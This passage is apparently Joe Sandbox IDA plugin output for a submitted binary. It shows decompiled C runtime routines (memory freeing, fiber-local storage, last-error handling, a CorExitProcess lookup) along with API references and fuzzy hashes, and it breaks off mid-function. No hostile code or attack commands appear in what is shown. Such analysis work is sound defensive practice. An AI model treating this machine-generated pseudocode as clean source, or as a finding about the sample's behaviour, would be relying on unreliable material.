                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                    • Opcode ID: 8559a25768205f77dbc15f2994331c7e46b0bac389b6b3e6e5e1e0c7aad1eef8
                                                                                                                                                                                                                                                    • Instruction ID: ca7bc7d97ab4237803d48527a81f36d249b62e224d72f9099b0cafa1d764f3d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8559a25768205f77dbc15f2994331c7e46b0bac389b6b3e6e5e1e0c7aad1eef8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49519F70E002499FDB14CFA9D889AEEBFF8FF09300F14415AE995EB291E7319941CB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DBC35(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t45 = _a4;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					E010DBBF9(_t45, 7);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                    					E010DBBF9(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                    					return E010DA6DA( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x010dbc3b
                                                                                                                                                                                                                                                    0x010dbc40
                                                                                                                                                                                                                                                    0x010dbc49
                                                                                                                                                                                                                                                    0x010dbc54
                                                                                                                                                                                                                                                    0x010dbc5f
                                                                                                                                                                                                                                                    0x010dbc6a
                                                                                                                                                                                                                                                    0x010dbc78
                                                                                                                                                                                                                                                    0x010dbc83
                                                                                                                                                                                                                                                    0x010dbc8e
                                                                                                                                                                                                                                                    0x010dbc99
                                                                                                                                                                                                                                                    0x010dbca7
                                                                                                                                                                                                                                                    0x010dbcb5
                                                                                                                                                                                                                                                    0x010dbcc6
                                                                                                                                                                                                                                                    0x010dbcd4
                                                                                                                                                                                                                                                    0x010dbce2
                                                                                                                                                                                                                                                    0x010dbced
                                                                                                                                                                                                                                                    0x010dbcf8
                                                                                                                                                                                                                                                    0x010dbd03
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbd13
                                                                                                                                                                                                                                                    0x010dbd18

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 010DBBF9: _free.LIBCMT ref: 010DBC22
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBC83
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: HeapFree.KERNEL32(00000000,00000000,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?), ref: 010DA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: GetLastError.KERNEL32(?,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?,?), ref: 010DA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBC8E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBC99
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBCED
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBCF8
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBD03
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DBD0E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                    • Instruction ID: 9c4493b1c6b763910e3c73bb49efdf455d4235d52d74848b3d2d6ea81984839e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118B31A40B06EADA30BBB1CC05FDB779CAF6A750F410C14B2DAA7090DAA6F5499750
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E010DF424(void* __ecx) {
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if( *0x116dda0 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_t25 = GetLastError();
                                                                                                                                                                                                                                                    					_t11 = E010E069E(__eflags,  *0x116dda0);
                                                                                                                                                                                                                                                    					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                    					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                    						_t11 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__eflags = _t11;
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							_t4 = E010E06D8(__eflags,  *0x116dda0, 0xffffffff);
                                                                                                                                                                                                                                                    							_pop(_t16);
                                                                                                                                                                                                                                                    							__eflags = _t4;
                                                                                                                                                                                                                                                    							if(_t4 != 0) {
                                                                                                                                                                                                                                                    								_t28 = E010DA67D(_t16, 1, 0x28);
                                                                                                                                                                                                                                                    								__eflags = _t28;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                    									_t11 = 0;
                                                                                                                                                                                                                                                    									E010E06D8(__eflags,  *0x116dda0, 0);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									__eflags = E010E06D8(__eflags,  *0x116dda0, _t28);
                                                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                                                    										_t11 = _t28;
                                                                                                                                                                                                                                                    										_t28 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								E010DA6DA(_t28);
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					SetLastError(_t25);
                                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x010df42b
                                                                                                                                                                                                                                                    0x010df43e
                                                                                                                                                                                                                                                    0x010df445
                                                                                                                                                                                                                                                    0x010df448
                                                                                                                                                                                                                                                    0x010df44b
                                                                                                                                                                                                                                                    0x010df464
                                                                                                                                                                                                                                                    0x010df464
                                                                                                                                                                                                                                                    0x010df44d
                                                                                                                                                                                                                                                    0x010df44d
                                                                                                                                                                                                                                                    0x010df44f
                                                                                                                                                                                                                                                    0x010df459
                                                                                                                                                                                                                                                    0x010df45f
                                                                                                                                                                                                                                                    0x010df460
                                                                                                                                                                                                                                                    0x010df462
                                                                                                                                                                                                                                                    0x010df472
                                                                                                                                                                                                                                                    0x010df476
                                                                                                                                                                                                                                                    0x010df478
                                                                                                                                                                                                                                                    0x010df48c
                                                                                                                                                                                                                                                    0x010df48c
                                                                                                                                                                                                                                                    0x010df495
                                                                                                                                                                                                                                                    0x010df47a
                                                                                                                                                                                                                                                    0x010df488
                                                                                                                                                                                                                                                    0x010df48a
                                                                                                                                                                                                                                                    0x010df49e
                                                                                                                                                                                                                                                    0x010df4a0
                                                                                                                                                                                                                                                    0x010df4a0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010df48a
                                                                                                                                                                                                                                                    0x010df4a3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010df462
                                                                                                                                                                                                                                                    0x010df44f
                                                                                                                                                                                                                                                    0x010df4ab
                                                                                                                                                                                                                                                    0x010df4b5
                                                                                                                                                                                                                                                    0x010df42d
                                                                                                                                                                                                                                                    0x010df42f
                                                                                                                                                                                                                                                    0x010df42f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,010DF41B,010DE807), ref: 010DF432
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 010DF440
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 010DF459
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,010DF41B,010DE807), ref: 010DF4AB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 84222be3b56adaa94fe01c0b3b3cb517cb9ec2b097a7f02d0bb732a7db1d982e
                                                                                                                                                                                                                                                    • Instruction ID: 2c187314b22ae7c67f8fdb974269e215b48e8ea7e9ea2bbb8f4b4e21620a594a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84222be3b56adaa94fe01c0b3b3cb517cb9ec2b097a7f02d0bb732a7db1d982e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6001403230A3139EAAB535BABC485AB3BC8EB555F83708339FDE1454EDDF5204419600
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                                    			E010D9C30(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr _t2;
                                                                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t29 = __edx;
                                                                                                                                                                                                                                                    				_t23 = __ecx;
                                                                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                                                                    				_t36 = GetLastError();
                                                                                                                                                                                                                                                    				_t2 =  *0x116d70c; // 0x2
                                                                                                                                                                                                                                                    				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                    				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t3 = E010DA67D(_t23, 1, 0x364);
                                                                                                                                                                                                                                                    					_t31 = _t3;
                                                                                                                                                                                                                                                    					_pop(_t25);
                                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                                    						_t4 = E010DA92D(_t25, _t36, __eflags,  *0x116d70c, _t31);
                                                                                                                                                                                                                                                    						__eflags = _t4;
                                                                                                                                                                                                                                                    						if(_t4 != 0) {
                                                                                                                                                                                                                                                    							E010D9AA2(_t25, _t31, 0x116df44);
                                                                                                                                                                                                                                                    							E010DA6DA(0);
                                                                                                                                                                                                                                                    							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                    							__eflags = _t31;
                                                                                                                                                                                                                                                    							if(_t31 == 0) {
                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_push(_t31);
                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_push(_t3);
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						E010DA6DA();
                                                                                                                                                                                                                                                    						_pop(_t25);
                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                    						SetLastError(_t36);
                                                                                                                                                                                                                                                    						E010DA63A(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                    						asm("int3");
                                                                                                                                                                                                                                                    						_push(_t20);
                                                                                                                                                                                                                                                    						_push(_t36);
                                                                                                                                                                                                                                                    						_push(_t31);
                                                                                                                                                                                                                                                    						_t37 = GetLastError();
                                                                                                                                                                                                                                                    						_t21 = 0;
                                                                                                                                                                                                                                                    						_t9 =  *0x116d70c; // 0x2
                                                                                                                                                                                                                                                    						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                    						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                    							_t32 = E010DA67D(_t25, 1, 0x364);
                                                                                                                                                                                                                                                    							_pop(_t27);
                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                    								_t11 = E010DA92D(_t27, _t37, __eflags,  *0x116d70c, _t32);
                                                                                                                                                                                                                                                    								__eflags = _t11;
                                                                                                                                                                                                                                                    								if(_t11 != 0) {
                                                                                                                                                                                                                                                    									E010D9AA2(_t27, _t32, 0x116df44);
                                                                                                                                                                                                                                                    									E010DA6DA(_t21);
                                                                                                                                                                                                                                                    									__eflags = _t32;
                                                                                                                                                                                                                                                    									if(_t32 != 0) {
                                                                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										goto L18;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(_t32);
                                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_push(_t21);
                                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                                    								E010DA6DA();
                                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                                    								SetLastError(_t37);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_t32 = E010DA8D7(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                                                                    								SetLastError(_t37);
                                                                                                                                                                                                                                                    								_t21 = _t32;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return _t21;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t31 = E010DA8D7(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						SetLastError(_t36);
                                                                                                                                                                                                                                                    						return _t31;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                    0x010d9c30
                                                                                                                                                                                                                                                    0x010d9c30
                                                                                                                                                                                                                                                    0x010d9c30
                                                                                                                                                                                                                                                    0x010d9c3a
                                                                                                                                                                                                                                                    0x010d9c3c
                                                                                                                                                                                                                                                    0x010d9c41
                                                                                                                                                                                                                                                    0x010d9c44
                                                                                                                                                                                                                                                    0x010d9c52
                                                                                                                                                                                                                                                    0x010d9c59
                                                                                                                                                                                                                                                    0x010d9c5e
                                                                                                                                                                                                                                                    0x010d9c61
                                                                                                                                                                                                                                                    0x010d9c64
                                                                                                                                                                                                                                                    0x010d9c76
                                                                                                                                                                                                                                                    0x010d9c7b
                                                                                                                                                                                                                                                    0x010d9c7d
                                                                                                                                                                                                                                                    0x010d9c88
                                                                                                                                                                                                                                                    0x010d9c8f
                                                                                                                                                                                                                                                    0x010d9c94
                                                                                                                                                                                                                                                    0x010d9c97
                                                                                                                                                                                                                                                    0x010d9c99
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9c7f
                                                                                                                                                                                                                                                    0x010d9c7f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9c7f
                                                                                                                                                                                                                                                    0x010d9c66
                                                                                                                                                                                                                                                    0x010d9c66
                                                                                                                                                                                                                                                    0x010d9c67
                                                                                                                                                                                                                                                    0x010d9c67
                                                                                                                                                                                                                                                    0x010d9c6c
                                                                                                                                                                                                                                                    0x010d9ca7
                                                                                                                                                                                                                                                    0x010d9ca8
                                                                                                                                                                                                                                                    0x010d9cae
                                                                                                                                                                                                                                                    0x010d9cb3
                                                                                                                                                                                                                                                    0x010d9cb6
                                                                                                                                                                                                                                                    0x010d9cb7
                                                                                                                                                                                                                                                    0x010d9cb8
                                                                                                                                                                                                                                                    0x010d9cbf
                                                                                                                                                                                                                                                    0x010d9cc1
                                                                                                                                                                                                                                                    0x010d9cc3
                                                                                                                                                                                                                                                    0x010d9cc8
                                                                                                                                                                                                                                                    0x010d9ccb
                                                                                                                                                                                                                                                    0x010d9cd9
                                                                                                                                                                                                                                                    0x010d9ce5
                                                                                                                                                                                                                                                    0x010d9ce8
                                                                                                                                                                                                                                                    0x010d9ceb
                                                                                                                                                                                                                                                    0x010d9cfd
                                                                                                                                                                                                                                                    0x010d9d02
                                                                                                                                                                                                                                                    0x010d9d04
                                                                                                                                                                                                                                                    0x010d9d0f
                                                                                                                                                                                                                                                    0x010d9d15
                                                                                                                                                                                                                                                    0x010d9d1d
                                                                                                                                                                                                                                                    0x010d9d1f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9d06
                                                                                                                                                                                                                                                    0x010d9ced
                                                                                                                                                                                                                                                    0x010d9ced
                                                                                                                                                                                                                                                    0x010d9cee
                                                                                                                                                                                                                                                    0x010d9cee
                                                                                                                                                                                                                                                    0x010d9d21
                                                                                                                                                                                                                                                    0x010d9d22
                                                                                                                                                                                                                                                    0x010d9d22
                                                                                                                                                                                                                                                    0x010d9ccd
                                                                                                                                                                                                                                                    0x010d9cd3
                                                                                                                                                                                                                                                    0x010d9cd7
                                                                                                                                                                                                                                                    0x010d9d2a
                                                                                                                                                                                                                                                    0x010d9d2b
                                                                                                                                                                                                                                                    0x010d9d31
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9cd7
                                                                                                                                                                                                                                                    0x010d9d38
                                                                                                                                                                                                                                                    0x010d9d38
                                                                                                                                                                                                                                                    0x010d9c46
                                                                                                                                                                                                                                                    0x010d9c4c
                                                                                                                                                                                                                                                    0x010d9c50
                                                                                                                                                                                                                                                    0x010d9c9b
                                                                                                                                                                                                                                                    0x010d9c9c
                                                                                                                                                                                                                                                    0x010d9ca6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d9c50

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,010D5EB1,?,?,?,010D4B88,?), ref: 010D9C34
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9C67
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9C8F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 010D9C9C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 010D9CA8
                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 010D9CAE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                    • Opcode ID: b83db99ec84ecbbee59f933cad41d7edc388c152e79aaaf094569218483646e9
                                                                                                                                                                                                                                                    • Instruction ID: 704c3f4e163872fdde7456e5c71d96d0cac02cd0089f5ba95283c445e490b420
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b83db99ec84ecbbee59f933cad41d7edc388c152e79aaaf094569218483646e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7F02836704706FBCA623229BD08FAE26DD9BD167DF210564F9D893194EF2688028221
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,010DC1FF,010DA67C,?,010DC19F,010DA67C,0112A700,0000000C,010DC2F6,010DA67C,00000002), ref: 010DC26E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 010DC281
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,010DC1FF,010DA67C,?,010DC19F,010DA67C,0112A700,0000000C,010DC2F6,010DA67C,00000002,00000000), ref: 010DC2A4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: bf93c74224a4810db16d206d9eba6322edbee35e69627877fca5cd48ed503814
                                                                                                                                                                                                                                                    • Instruction ID: 672f78f2c14276d0429737001de1b78f8e33bf4f13d152cd9122dcf49563f211
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf93c74224a4810db16d206d9eba6322edbee35e69627877fca5cd48ed503814
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7F0C830600318BFDB259F95DC09BEEBFF4EF18715F0000A8F949A6280CB754944CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                                    			E010DA4FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                    				char _v16;
